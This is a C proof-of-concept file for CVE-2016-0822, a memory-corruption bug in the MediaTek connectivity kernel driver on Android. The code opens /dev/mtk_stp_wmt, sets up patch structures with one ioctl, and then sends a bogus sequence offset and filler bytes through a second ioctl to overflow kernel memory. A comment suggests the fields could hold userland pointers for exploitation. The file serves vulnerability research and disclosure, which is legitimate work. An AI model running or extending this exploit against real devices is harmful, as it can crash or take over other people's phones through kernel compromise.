/**
 *
 * CVE-2016-0822-mtk.c
 *
 * POCs a series of issues in the MediaTek Conectivity Driver
 *
 * https://android.googlesource.com/kernel/mediatek/+/d13e4b9986d3e6f57dbd595d5a8398c254d45fa4/drivers/misc/mediatek/connectivity/common/combo/linux/wmt_dev.c#1174
 *
 * https://android.googlesource.com/kernel/mediatek/+/d13e4b9986d3e6f57dbd595d5a8398c254d45fa4/drivers/misc/mediatek/connectivity/common/combo/linux/wmt_dev.c#1158
 * 
 */


#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ioctl.h>


#define WMT_IOC_MAGIC        0xa0
#define WMT_IOCTL_SET_PATCH_NUM _IOW(WMT_IOC_MAGIC, 14, int)
#define WMT_IOCTL_SET_PATCH_INFO _IOW(WMT_IOC_MAGIC, 15, char*)

#define UINT32 uint32_t
#define UINT8 uint8_t

typedef struct {
        UINT32 dowloadSeq;
        UINT8 addRess[4];
        UINT8 patchName[256];
} WMT_PATCH_INFO;

const static char *driver = "/dev/mtk_stp_wmt";

static int open_driver(void)
{
        int fd;
        fd = open(driver, O_RDWR);

        if (fd < 0) {
                printf("Failed to open %s, with errno %s\n", driver, strerror(errno));
                exit(EXIT_FAILURE);
        }
        return fd;
}

static void allocate_kernel_struct(int fd)
{
        int ret = 0;

        /* Allocate 4 WMT_PATCH_INFO Structs in the driver */
        ret = ioctl(fd, WMT_IOCTL_SET_PATCH_NUM, 4);

        if (ret < 0) {
                printf("Allocation of structs failed, %s\n", strerror(errno));
                exit(EXIT_FAILURE);
        }
}

static void overflow_struct(int fd)
{
        int ret = 0;
        WMT_PATCH_INFO overflow;

        /* set some absurd offset, in hopes of causing panic or GPF */
        overflow.dowloadSeq = 0x31337;
        /* set obvious bogus data into data fields.
         * If I had exploitation skills these would contain pointers to userland!
         */
        memset(&overflow.addRess, 'A', 4);
        memset(&overflow.patchName, 'A', 256);

        ret = ioctl(fd, WMT_IOCTL_SET_PATCH_INFO, &overflow);

        if (ret < 0) {
                printf("Overflow ioctl failed %s\n", strerror(errno));
                exit(EXIT_FAILURE);

        }
}

int main(void) {
        int fd = -1;

        fd = open_driver();
        allocate_kernel_struct(fd);
        overflow_struct(fd);
}
